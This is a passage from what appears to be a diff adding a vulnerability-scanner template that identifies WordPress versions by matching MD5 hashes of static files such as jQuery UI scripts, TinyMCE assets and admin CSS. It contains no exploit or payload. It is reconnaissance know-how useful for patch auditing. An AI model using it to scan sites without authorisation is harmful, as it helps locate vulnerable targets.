"{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/media.gif" + matchers: + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"b1a62e29a44128ae7a3d932b4941ea33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/page.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"ec8d1ed1b0fd137cacdda9e316ebed31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/video.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"233f9a78eadddb26f8976682e6d1bf44\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"10a455edf8439d00599854ffd2add437\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/audio.gif" + matchers: + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"edc58dce8aab5d12e83fd4aac849cc05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/image.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fe5bd0edc99f44dfe3ec2302359a7f81\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"c25dc2e7e5c0c2203ca0ca516ca852a9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/lock.png" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1acca50f0abf4ccd7a0f34669815158a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/lock-2x.png" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"6e0a92872a2545f5bf44bf7e3daa73c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"70f1542f61be52ac4751c00563434e07\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/colors-rtl.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"a67ae8fd5b6ca211970eed4a7e466bbb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-rtl.min.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"b94de9cd5aa0fbbbf9b48d7338969e3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors.min.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"ac70977f942003cec4863894ecb13b10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-preview.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7780c09b0a726bc2cad5416aa4f6d253\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"36dabc552ff9315e1e782ad144ea383d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7897b96ae14a96dbe9cd2e5f8236eb10\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.3 + dsl: + - "(\"8c36f08abc18e61fdc1be3e450198829\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"2a45bb51fcab2c53f7e723ca2daf1847\" == md5(body))" + - type: dsl + name: 2.6 - 2.7.1 + dsl: + - "(\"74c371f0a247009485920605bcc286b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-preview.min.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"e95ad5d62ad2871162b4636b2884d907\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7897b96ae14a96dbe9cd2e5f8236eb10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-install.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f0dbe61086f880896f44ddb173933101\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-clip.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"38df21cba8ed00415b2229c3053f0a31\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"71a13d33f3fc7de23f13adcc4593a5a2\" == md5(body))" + - type: dsl + name: 
3.5 - 3.5.2 + dsl: + - "(\"c566a56516cfa9b0f5f0af9515edd008\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.droppable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c86a22c5e36db0f80387ce5de67787e9\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"79ea08a1eb866ba2039cc617ada702de\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0d6eef31f7bd7215fc554b1455435efc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"07b2b6e067cae96848f1e017015e707e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"82d400563161bb3afc1f882102b294c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-drop.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2115305b0244e5d8cfb9dc458c3e1697\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1d045fd3777c8376972022e868891b86\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"82eab8c3912d259f462a229b7b4f2081\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"68e1e677a33fca5ac047a6a85166aef2\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"35086553121b0423a8f2eaaedca79152\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e90017815cdefec31a27eef26a1df6f7\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"ebaf9ac23de07b1e2edf1cfdd9d24859\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ae1d9455fbd716115805a887d3942d2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.selectable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1e412d9b7ffb5165882ec4ee9dca7706\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"6908d69d10dae3d04c23ca83a884ba6f\" == md5(body))" 
+ - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"5498a8027d4314a6b7aecc07400c15f8\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2a4ae2945b0ad112bc7453746e73fef0\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5fd0d80a25092cf8dc3d9e4828ec0752\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-pulsate.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"fe8fa2aa4dd64302aa4481758019ff12\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3d639b4c14c1f6b080f746b7250554c3\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"5ac5c5ca652b881fe4073440719f9102\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-highlight.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ad71fc19d449fe8ecd391a90dc4de8e0\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"15b8d390675cf17bc3a73c3619557fb4\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"da7641af95d688d998c837bec535ea88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ae99e1c6db93d17a07dcce723c463239\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3d531a65189ab04b164e9ac6ff708c06\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"490d0168365536638cb63e97b69494b1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b2f62945320bd46f2e119cec08b9996a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"67beffac9e06139da85198dadac7e62c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-shake.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"889151a84fe86e382bb7179f1206fe96\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - 
"(\"782fbb6948781cffd80ddf4030196952\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4b5ef540c8212613d8bc80c90386b522\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.button.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"13e7c6415ec4583e4b315e58ec4b7834\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1cc433c88d349c513c801378c4493f19\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"841ae1782456e0e034e446bc34c18a82\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7ad0bc035cc7e8e29092f06b28c80220\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1f54112461c2b804e4bda1b4ba414694\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"e3530409f1b673099f3d157d6c76c204\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1cca9d1d61a8a9bef77cfea0f39e793d\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ea9fbda91a34e85949e727926665f4af\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"26865f17edea007af640cfb6abc38d7a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c14059b12deb5821c173ddbe02779cfe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.dialog.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"a4ffef594374acd633876798ffea4b91\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3248497acc4c9a3eae7d094860937708\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"29610778c84d9db4858c8aafe9315229\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a360a66b85be756d2fefd8b1ed4c4105\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cedbf30a51c03d9ea72743da1cea9402\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-scale.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"517c49b86b5c4222824e33cf97a66d1b\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"783b0ad56b1a8a97b76079a1d41c6f88\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ebae30aac3140e8c77dff67bfe0aba5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.position.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"99dbb2ac7cccbbc1686ff85eaf708cbf\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"eb63c3d2dace62e102af74004ccd0ff1\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"dd2ebb2a9d3b4d3e6fc95142fe607e34\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"61d86a8b3e7d4fcefbac74a1fe050f74\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ce593c703df82b3e1785156376ef1a11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-fade.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f61525a55b0447eff9182e652db51d93\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"79debe8459f8ceca8443086bf29e16a0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"36eebb647c0021b081027d95a4681a08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"96f1e6bd9d9d042789d9b8f297e1ffe8\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"ea7d13d6d2212ba59159c40b2a57bd3b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"14927dd90ee28ed46043547c56638549\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.core.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"47a22779d977534304f6cb122c97941a\" == md5(body))" + - 
type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"739cf68f21c10e04cde3ad13fcff9063\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"f8d56d3c5539aa7af2a7d5c3b8769fad\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c57795d684b34461c7ab90c951c7b7ee\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"35c8345d40fba7cc538b677eef8ec850\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.autocomplete.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"baad8e5edee09423cfe9ee7bb80f7f4a\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"c6c4d43ac586574589a0ec4542a890a8\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"697382ab550d87badbc9e4f8ba547b60\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"cc93470f358beca9abfc5b0429a6147b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e4781373802509fc3a51adb8a94cecc8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.accordion.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6b215c5f733a5bca4b177f9bda08f9f4\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1da489eb8b596be7a49f1be959249988\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"75ac483f270380c9a0a4e8eb5b6f3dd0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"45b90c748b46dead2768518a6b0709c7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c4472933c20ad20fc1d3d07cf3faa1e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.menu.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"023299ce8c17c78401167034e5b85450\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"e0b94d0041ca790b68af39edf821d238\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"3b0fa982a618f8885056b51d41076d0c\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.widget.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6af6a92aebd26adca4ae22c3d09461f6\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"2425a542e6dde093dd85ac0b5adc0141\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a5626b56956b854edc4435086b81e642\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7348be0976e007a8c2c02771b5e56ffa\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"0b4c5afffc6ba25e76716562a9c40a75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-fold.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ae38de0e6df5afa3bedc421925ce7096\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"f8cda9cadd854d552cc429d799274962\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"8074c41343e8123a8567de8af452fc72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.tooltip.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2e5eaa037be632c86345268ee8c1fe6b\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"4fbdb31340b01c249a0fe5112e0eeec9\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a0c1fb100694e7e398afd0a3517e8273\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"66bbb2f50ed3e02600c28fc7c859b05e\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"945300af618d04041dc49a0a5d36a917\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d1d2843cdbebec3ec262539e8f482655\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.spinner.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - 
"(\"e30fecf15dccffecff23eb28c1be77af\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"ab6ea5b371afc02315dfaa7dfd4a1063\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7a5e4203edf87c7e35b57c63bcc34903\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"362c4b75ca21578fd5c432d32fc9f1e9\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"4eac58ed8deb3189c8d05bab9187f1ce\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e36a086123756412293231aead17f24f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2a31d31b165267910cc15a22bcbf14ca\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"abc084e9e6b74f46560d1907bcfd87d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2f11b4228a5e5d7c7dbc5531759950cf\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"67b603ea0e4abe708f871111fcf45738\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"8c3ca109cbf3a09e50c356b6a1826c05\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"5bf4c3ca95229659f8d7b0cf7d8cc1d3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"8c466e9448e2b021e622219c814dad45\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-bounce.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"21cc68d16d1f76275ad082d7ddb3e178\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"81ee7ab27ed9b0f3556a406ff6aad80b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"575070d688f2df8beb11595b36a5406d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-transfer.min.js" + matchers: + - type: dsl + 
name: 3.9 - 4.0.32 + dsl: + - "(\"2fef9f5562e8443aa48377192b176cd4\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"e91b94a47085eac01afbf48c8cd515f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0df5a22bfac5e648139f4a3cabfb39b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"b05882cb208b67920eaa74118594be2d\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"513bb6d79ab29c58ab1b32646216a3a0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"2b09e33474c5641d8b63eaf28e870a66\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"039f3a81ac2f843432776ee10243b89a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"10c48f90c42550a8afeb81ec34650b10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-blind.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"8780c4224e8780a782bf0cbd950730e3\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"625c5e7376d305ce4a11fd1277de5734\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"77bc3e84b750f288c68d789dfb28144f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-explode.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6c1e41c026f4d9164e07a06acf53e297\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3ae92de7419e58815544147641a87930\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ffec1f546e53676923f4a05ca20790a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.slider.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6c2a0e39e722f5d2a71050ee333fd2c5\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"f1b234712eabc4fea71eaadcf2e73ffa\" == 
md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"38d250e04af3d561f01156273f08d578\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9d26e2b237072855950bf775167fc9ea\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"0372be5e22fbd74d08ffea592641b29d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.sortable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"765770c2918bd191e5ddb68675cc646c\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"cccbd3de04d2ff8cd30164925353c394\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4a6b8c51735314ad669b4a73eab51726\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"24834266535ff3a5db2919a4dfa3a3b6\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8028f7b79584c14f5a092ed63affd4d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no-alt.png" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1f8f2cd07a0f188ec8d9ff9275c45195\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/plugin.min.js" + matchers: + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"76c195e5f157603feb495fe3fffbc33d\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"752bc22829ec5687577f564a98637b9b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e0ed4ec71acf14a2635ccbbad48a5a9f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/plugin.js" + matchers: + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"dd83030fdd725c148b2b7a4aded9da13\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"f3a8ace36ec4e062874b89d6dfddde82\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"dbda3aebfc716b2bc73abe6600b65d52\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.json" + matchers: + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"bff751d0bdde38eebbe0c90df8a510cc\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"899efe22d79dd0d675c106a242e18858\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/readme.md" + matchers: + - type: dsl + name: 3.9 - 4.7.19 + dsl: + - "(\"7a0f64800cf38b2be8d3dc4540ec31dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.json" + matchers: + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"fcf1ab0bbad7d5be115cac9ffb360a2b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e041fb0d325f73103a921ed01e5356b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/moxieplayer.swf" + matchers: + - type: dsl + name: 3.9 - 4.7.19 + dsl: + - "(\"4e59d34efb2da0b9a033596a85e4b1ef\" == md5(body))" + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"9217cea72c76c361fa5033526712284e\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.6.1 + dsl: + - "(\"f1cb08168139602b35bc61f1d9823ea3\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"534258f2d5d40b3b683940d19f585695\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpembed/plugin.min.js" + matchers: + - type: dsl + name: 4.4 - 4.7.19 + dsl: + - "(\"7ec45bcbe992c74c095a75bb2d2cf0ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpembed/plugin.js" + matchers: + - type: dsl + name: 4.4 - 4.7.19 + dsl: + - "(\"cf382af5522fa9a0bb3f049225de14ef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/wlwmanifest.xml" + matchers: + - type: dsl + name: 3.8 - 5.6 + dsl: + - "(\"dfd490b6f383ea02a269031ff05e8896\" == md5(body))" + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"b23aa270acc2240a9a22082550a8680c\" == 
